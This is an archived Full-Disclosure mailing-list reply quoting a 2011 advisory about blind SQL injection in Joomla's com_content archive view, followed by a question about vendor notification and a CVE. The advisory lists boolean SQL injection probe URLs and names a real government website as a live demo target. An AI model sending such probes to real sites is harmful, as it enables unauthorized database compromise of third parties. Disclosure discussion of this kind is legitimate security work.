[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Joomla Component (com_content) - Blind SQL Injection Vulnerability

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] Joomla Component (com_content) - Blind SQL Injection Vulnerability
From: Henri Salo <henri@xxxxxxx>
Date: Sun, 13 Nov 2011 21:06:23 +0200

On Sat, Nov 12, 2011 at 12:35:35AM +0100, research@xxxxxxxxxxxxxxxxxxxxx wrote:
> Title:
> ======
> Joomla Component (com_content) -  Blind SQL Injection Vulnerability
> 
> 
> Date:
> =====
> 2011-11-11
> 
> 
> References:
> ===========
> http://www.vulnerability-lab.com/get_content.php?id=323
> 
> 
> VL-ID:
> =====
> 323
> 
> 
> Introduction:
> =============
> Joomla is a free and open source content management system (CMS) for 
> publishing content on
> the World Wide Web and intranets and a model–view–controller (MVC) Web 
> application framework
> that can also be used independently.
> Joomla is written in PHP, uses object-oriented programming (OOP) techniques 
> and software design
> patterns[citation needed], stores data in a MySQL database, and includes 
> features such as page
> caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, 
> search, and support
> for language internationalization.
> Joomla had been downloaded 23 million times. Between March 2007 and February 
> 2011 there had been
> more than 21 million downloads. There are over 7,400 free and commercial 
> extensions available
> from the official Joomla! Extension Directory and more available from other 
> sources
> 
> (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Joomla!)
> 
> 
> Abstract:
> =========
> A vulnerability laboratory researcher discovered a Blind SQL Injection 
> vulnerability on the com_content component of the joomla CMS.
> 
> 
> Status:
> ========
> Published
> 
> 
> Exploitation-Technique:
> =======================
> Remote
> 
> 
> Severity:
> =========
> Critical
> 
> 
> Details:
> ========
> A blind SQL Injection vulnerability was detected on the com_content component 
> of the joomla CMS.
> The vulnerability allows an attacker (remote) to inject/execute own sql 
> statements on the affected application dbms.
> Successful exploitation of the vulnerability can result in compromise of the 
> affected application dbms.
> 
> Vulnerable Module(s):
>                                                         [+] com_content
> 
> 
> Proof of Concept:
> =================
> The vulnerability can be exploited be remote attackers. For demonstration or 
> reproduce ...
> 
> 1: [Site]/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI]     
>                                                                               
>   
> 2: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=1--   
>                                                                               
>   
> 3: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=0--   
> 
> 
> [x] Demo :
> 
> http://www.paul.house.gov/index.php?option=com_content&view=archive&year=-1 
> or 1=0--
> 
> 
> Risk:
> =====
> The security risk of the blind sql injection vulnerability is estimated as 
> critical.
> 
> 
> Credits:
> ========
> E.Shahmohamadi  (IRAN)
> 
> 
> Disclaimer:
> ===========
> The information provided in this advisory is provided as it is without any 
> warranty. Vulnerability-Lab disclaims all warranties, 
> either expressed or implied, including the warranties of merchantability and 
> capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including direct, 
> indirect, incidental, consequential loss of business 
> profits or special damages, even if Vulnerability-Lab or its suppliers have 
> been advised of the possibility of such damages. Some 
> states do not allow the exclusion or limitation of liability for 
> consequential or incidental damages so the foregoing limitation 
> may not apply. Any modified copy or reproduction, including partially usages, 
> of this file requires authorization from Vulnerability-
> Lab. Permission to electronically redistribute this alert in its unmodified 
> form is granted. All other rights, including the use of 
> other media, are reserved by Vulnerability-Lab or its suppliers.
> 
>                                               Copyright © 
> 2011|Vulnerability-Lab
> 
> -- 
> Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
> Contact: admin@xxxxxxxxxxxxxxxxxxxxx or support@xxxxxxxxxxxxxxxxxxxxx

Did you report this to Joomla? Have you asked CVE ID?

Best regards,
Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Joomla Component (com_content) - Blind SQL Injection Vulnerability
  - From: research@xxxxxxxxxxxxxxxxxxxxx

Prev by Date: Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
Next by Date: Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
Previous by thread: Re: [Full-disclosure] Joomla Component (com_content) - Blind SQL Injection Vulnerability
Next by thread: Re: [Full-disclosure] Even worse
Index(es):
- Date
- Thread